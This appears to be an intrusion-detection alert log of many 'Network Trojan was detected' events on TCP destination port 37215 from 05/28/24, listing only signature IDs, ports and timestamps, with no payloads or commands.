            SID:2835222
            Source Port:47184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866475
            SID:2829579
            Source Port:53466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762128
            SID:2829579
            Source Port:40684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470592
            SID:2829579
            Source Port:40172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053993
            SID:2835222
            Source Port:58928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052526
            SID:2835222
            Source Port:39684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818507
            SID:2835222
            Source Port:34032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779145
            SID:2835222
            Source Port:33540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810688
            SID:2835222
            Source Port:55062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039700
            SID:2835222
            Source Port:50838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727708
            SID:2829579
            Source Port:39418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961360
            SID:2835222
            Source Port:33464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.622947
            SID:2835222
            Source Port:51894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776750
            SID:2829579
            Source Port:35772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899771
            SID:2835222
            Source Port:51332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557442
            SID:2829579
            Source Port:46236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617566
            SID:2835222
            Source Port:51672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772648
            SID:2829579
            Source Port:34918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377966
            SID:2829579
            Source Port:46986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541160
            SID:2835222
            Source Port:59596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818124
            SID:2835222
            Source Port:46654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754527
            SID:2835222
            Source Port:39356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.072410
            SID:2829579
            Source Port:53138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014522
            SID:2829579
            Source Port:47770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670393
            SID:2829579
            Source Port:33330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010443
            SID:2829579
            Source Port:43446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766776
            SID:2829579
            Source Port:35732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920011
            SID:2835222
            Source Port:49236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.599600
            SID:2835222
            Source Port:56096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837241
            SID:2829579
            Source Port:43752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999481
            SID:2829579
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644327
            SID:2829579
            Source Port:43396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.078600
            SID:2835222
            Source Port:49302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045340
            SID:2835222
            Source Port:57436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847660
            SID:2835222
            Source Port:34872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.878779
            SID:2829579
            Source Port:56780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752782
            SID:2835222
            Source Port:37380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222034
            SID:2835222
            Source Port:55820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541612
            SID:2829579
            Source Port:54896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872225
            SID:2835222
            Source Port:55302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491693
            SID:2829579
            Source Port:43170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904474
            SID:2829579
            Source Port:41550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061184
            SID:2829579
            Source Port:39444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040710
            SID:2835222
            Source Port:37606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860679
            SID:2835222
            Source Port:60202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761453
            SID:2829579
            Source Port:60156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871399
            SID:2829579
            Source Port:45500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743139
            SID:2829579
            Source Port:39680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027681
            SID:2829579
            Source Port:41882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824216
            SID:2835222
            Source Port:40230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277038
            SID:2835222
            Source Port:47192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941599
            SID:2835222
            Source Port:43318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.201589
            SID:2829579
            Source Port:47264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069071
            SID:2835222
            Source Port:53778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309685
            SID:2835222
            Source Port:54610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.942758
            SID:2829579
            Source Port:42526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755691
            SID:2829579
            Source Port:37792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862306
            SID:2829579
            Source Port:52640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697345
            SID:2835222
            Source Port:42346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885242
            SID:2829579
            Source Port:43122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765782
            SID:2829579
            Source Port:43074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919994
            SID:2835222
            Source Port:38640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919445
            SID:2835222
            Source Port:33208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894124
            SID:2835222
            Source Port:56108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935164
            SID:2835222
            Source Port:52822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.606282
            SID:2829579
            Source Port:41362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878651
            SID:2829579
            Source Port:40900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.358548
            SID:2829579
            Source Port:33006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542714
            SID:2829579
            Source Port:35840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855408
            SID:2829579
            Source Port:34784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777826
            SID:2835222
            Source Port:35992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872303
            SID:2835222
            Source Port:39422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776796
            SID:2829579
            Source Port:40894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.576000
            SID:2829579
            Source Port:52360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803831
            SID:2829579
            Source Port:35594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748430
            SID:2829579
            Source Port:58508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.948965
            SID:2835222
            Source Port:47284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812154
            SID:2835222
            Source Port:37308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019210
            SID:2835222
            Source Port:48666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031004
            SID:2829579
            Source Port:36754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058051
            SID:2829579
            Source Port:44318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805167
            SID:2829579
            Source Port:42402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818604
            SID:2829579
            Source Port:55546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.532177
            SID:2829579
            Source Port:43636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533728
            SID:2829579
            Source Port:34288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954522
            SID:2835222
            Source Port:60916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953547
            SID:2835222
            Source Port:34458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953208
            SID:2829579
            Source Port:60154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742622
            SID:2829579
            Source Port:47092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827792
            SID:2835222
            Source Port:41608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901442
            SID:2829579
            Source Port:52980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746789
            SID:2835222
            Source Port:35096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058641
            SID:2829579
            Source Port:58878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936922
            SID:2829579
            Source Port:51110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473370
            SID:2835222
            Source Port:45026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764185
            SID:2835222
            Source Port:47926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823216
            SID:2835222
            Source Port:53088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924970
            SID:2829579
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734242
            SID:2835222
            Source Port:41630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898897
            SID:2829579
            Source Port:44276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989265
            SID:2829579
            Source Port:41404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425220
            SID:2835222
            Source Port:56316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817697
            SID:2835222
            Source Port:42708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323220
            SID:2829579
            Source Port:57900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764325
            SID:2829579
            Source Port:46394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910980
            SID:2829579
            Source Port:37986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922477
            SID:2829579
            Source Port:49006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350247
            SID:2829579
            Source Port:42712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552569
            SID:2835222
            Source Port:60880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435779
            SID:2829579
            Source Port:58880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834189
            SID:2835222
            Source Port:47490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524380
            SID:2829579
            Source Port:49306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861235
            SID:2829579
            Source Port:41434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825414
            SID:2835222
            Source Port:57152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946790
            SID:2829579
            Source Port:55010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745560
            SID:2829579
            Source Port:46612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938125
            SID:2829579
            Source Port:44680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371143
            SID:2829579
            Source Port:52724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853846
            SID:2829579
            Source Port:43380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878875
            SID:2835222
            Source Port:43674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.585876
            SID:2829579
            Source Port:44552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773882
            SID:2835222
            Source Port:60588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952726
            SID:2829579
            Source Port:34522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.492644
            SID:2829579
            Source Port:57300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.366988
            SID:2829579
            Source Port:32904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872319
            SID:2829579
            Source Port:36930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972576
            SID:2835222
            Source Port:51916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061227
            SID:2829579
            Source Port:52066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261731
            SID:2835222
            Source Port:41128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.343899
            SID:2829579
            Source Port:43158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759289
            SID:2835222
            Source Port:42924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.927047
            SID:2829579
            Source Port:37416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059610
            SID:2835222
            Source Port:49966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532968
            SID:2829579
            Source Port:42870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931976
            SID:2835222
            Source Port:36116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047544
            SID:2835222
            Source Port:50542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897924
            SID:2835222
            Source Port:34236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987575
            SID:2829579
            Source Port:45490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936209
            SID:2835222
            Source Port:46614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761504
            SID:2829579
            Source Port:57678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948306
            SID:2835222
            Source Port:54336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290816
            SID:2829579
            Source Port:46668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057880
            SID:2829579
            Source Port:50942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610806
            SID:2835222
            Source Port:44970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066960
            SID:2829579
            Source Port:44010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.341949
            SID:2829579
            Source Port:52196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.719130
            SID:2829579
            Source Port:35986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842597
            SID:2835222
            Source Port:49338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936829
            SID:2829579
            Source Port:43314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.913016
            SID:2829579
            Source Port:48922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.006107
            SID:2829579
            Source Port:55146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875201
            SID:2835222
            Source Port:37682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780157
            SID:2829579
            Source Port:48556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727515
            SID:2835222
            Source Port:39680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.950738
            SID:2829579
            Source Port:55066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004886
            SID:2835222
            Source Port:46018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532341
            SID:2835222
            Source Port:44942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056937
            SID:2835222
            Source Port:58450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302064
            SID:2829579
            Source Port:40460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263306
            SID:2835222
            Source Port:58280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754984
            SID:2835222
            Source Port:45120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930012
            SID:2829579
            Source Port:46954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.767077
            SID:2835222
            Source Port:60858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.849709
            SID:2835222
            Source Port:36996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884502
            SID:2835222
            Source Port:37106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850422
            SID:2835222
            Source Port:57298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839623
            SID:2835222
            Source Port:57776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.486067
            SID:2835222
            Source Port:54438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734284
            SID:2829579
            Source Port:36618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335391
            SID:2835222
            Source Port:47504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412838
            SID:2829579
            Source Port:33274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507828
            SID:2829579
            Source Port:37416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507968
            SID:2829579
            Source Port:50594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918199
            SID:2835222
            Source Port:52604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.999410
            SID:2835222
            Source Port:41238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299712
            SID:2829579
            Source Port:49598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808187
            SID:2835222
            Source Port:34772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862986
            SID:2835222
            Source Port:56154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943331
            SID:2829579
            Source Port:37512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968003
            SID:2829579
            Source Port:36102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042591
            SID:2835222
            Source Port:33456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939320
            SID:2835222
            Source Port:38210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885428
            SID:2829579
            Source Port:40670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278187
            SID:2829579
            Source Port:56126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.528011
            SID:2835222
            Source Port:51224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961497
            SID:2829579
            Source Port:55328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.781943
            SID:2829579
            Source Port:55324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273453
            SID:2829579
            Source Port:54218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984521
            SID:2829579
            Source Port:56846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865874
            SID:2829579
            Source Port:54358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533751
            SID:2829579
            Source Port:47284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953294
            SID:2829579
            Source Port:54146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927743
            SID:2829579
            Source Port:51370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004071
            SID:2829579
            Source Port:43452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760009
            SID:2835222
            Source Port:59972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507449
            SID:2829579
            Source Port:57874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047517
            SID:2829579
            Source Port:42170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869871
            SID:2829579
            Source Port:58364
            Destination Port:37215
